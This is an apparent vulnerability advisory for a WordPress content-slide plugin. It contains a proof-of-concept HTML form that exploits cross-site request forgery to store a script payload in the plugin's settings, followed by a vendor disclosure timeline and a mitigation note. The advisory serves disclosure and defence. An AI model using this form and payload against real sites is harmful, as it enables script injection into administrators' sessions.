While logged into a site with the plugin enabled open a page containing the following form and click the submit button (in a real attack the form could be made to auto-submit):

<form action="http://localhost/wp-admin/admin.php?page=content-slide/content_slide.php" method="POST">
  <input type="text" name="wpcs_options[no_of_custom_images]" value="1">
  <input type="text" name="wpcs_options[slide_image1]" value="&quot;>&lt;script>alert(1)&lt;/script>">
  <input type="submit">
</form>

If using a browser without reflected XSS mitigation (e.g. Chrome) the admin user will see “1” in an alert box, otherwise a refresh of the page is required before the JavaScript is executed.

• 2014-10-08: Discovered
• 2014-12-16: Reported to vendor via email form at http://www.snilesh.com/contact-me/
• 2014-12-16: Requested CVE
• 2015-01-07: Vendor responded
• 2015-01-09: Vendor chased
• 2015-04-09: Vendor had given assurances that a fix would be available, and was given multiple extensions to do so, but by this point they had stopped responding. Emailed plugins@wordpress.org requesting a takedown.
• 2015-04-16: Confirmed that the plugin is no longer on the directory. Published.

Disable the plugin until a new version is released that fixes this bug

At the time of publishing no fix is available and the plugin has been removed from the plugin directory